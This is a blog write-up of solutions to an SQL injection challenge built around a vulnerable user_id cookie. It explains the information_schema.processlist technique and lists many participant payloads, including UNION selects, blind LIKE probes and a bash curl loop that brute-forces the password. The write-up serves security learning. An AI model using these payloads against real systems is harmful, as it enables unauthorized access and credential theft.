Solutions for challenge 2B

Posted on August 16, 2012 by Roberto Salgado

After posting the solutions for challenge 2A from the series of SQL Injection challenges, it only made sense to continue with 2B, since 'B' is a slightly more difficult variation of 'A'. Challenge 2B is probably my favorite challenge because of its simplicity, and because of how confusing it turned out to be for many participants.



DISCLAIMER: If you haven't tried this challenge, it was available here (the link is no longer online) in case you want to give it a shot before reading the SOLUTIONS below.

This challenge, similar to 2A, allows you to log in as guest and creates the cookie user_id, which is vulnerable to SQL Injection. Initially no filtering was used, since the idea behind the challenge was to figure out different ways of retrieving the table/column names. What is tricky about this challenge is that it stores the credentials in a temporary table, and the temp table only exists during the PHP script's execution (a MySQL temporary table is private to the connection that created it and is dropped when that connection closes). Because temporary tables do not appear in information_schema.tables or information_schema.columns, this was the perfect way of making participants figure out other methods for obtaining the table/column names.

The intended solution is to use information_schema.processlist, which is available starting from MySQL 5.1. Its info column holds the text of the statement each thread is currently executing, so injecting union select info from information_schema.processlist returns the whole query being run, injected payload included, which can be extremely useful when table_name/column_name are being blocked by a WAF/IDS. Two practical details: the union must supply the same number of columns as the original SELECT (two in this challenge, which is why the payloads pad with a second value), and without the PROCESS privilege a user only sees their own threads, which is all that is needed here since the thread running the injected query is the one of interest.


-1 union select info,2 from information_schema.processlist

SELECT websec_rocks_temp_username, websec_rocks_temp_user_priv FROM websec_rocks_temp_uzuAr1Os WHERE websec_rocks_temp_user_id = -1 union select info,2 from information_schema.processlist

Challenge Modifications

After w00d's and Miroslav's solutions, I made two slight adjustments to the challenge so that it would be solved as intended. w00d's solution used PROCEDURE ANALYSE(), so I decided to block the word 'PROCEDURE', since this method is already documented in The SQL Injection KB; w00d later submitted a solution using the intended method. As for Miroslav, he was able to find the column name through a dictionary attack using the txt/common-columns.txt file from sqlmap. The second modification was to change the column names so they could no longer be guessed.




user_id= 3 union select 1,2,concat_ws(0x3a,command,time,state,info),4 from information_schema.processlist limit 1-- -





curl -i --cookie "user_id=0 limit 3,1 PROCEDURE ANALYSE()"

curl -i --cookie "user_id=-1 union select group_concat(info),2 from information_schema.processlist"

Miroslav Stampar:


user_id=0 AND ORD(MID(temp_password,17,1))>1 LIMIT 0,1


user_id=-1 union select info,'padding' from information_schema.processlist#


user_id=0+and+1=0+union+select+1,unhex(hex(concat_ws(0x3a,info,state)))+from information_schema.processlist limit 0,1

user_id=0 and websec_rocks_temp_password like 'a%'


Used processlist

user_id=0 and websec_rocks_temp_password like '%'


Used processlist

for i in {4,5,6,7} ; do for j in {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} ; do curl -b "user_id=-9 or websec_rocks_temp_password LIKE 0x454c5f4d55595f56455247${i}${j}25" 2>&1 | grep ADMIN ; echo $i$j ;done; done


user_id=-1 union select info,2 from information_schema.processlist limit 1;

user_id=0 and (@:=websec_rocks_temp_password) union select @,1;


user_id=5 UNION select 1,(select info from information_schema.processlist LIMIT 1)

Same script from challenge 2A.


Used processlist


Submitted a Python script found here.


user_id=-1 union select 1,info from information_schema.PROCESSLIST limit 0,1#

user_id=0 and LENGTH(websec_rocks_temp_password)=16#

user_id=0 and websec_rocks_temp_password like 0x25656c5f6d75795f76657267756974617325#


A full list of the victors for each challenge is available here.
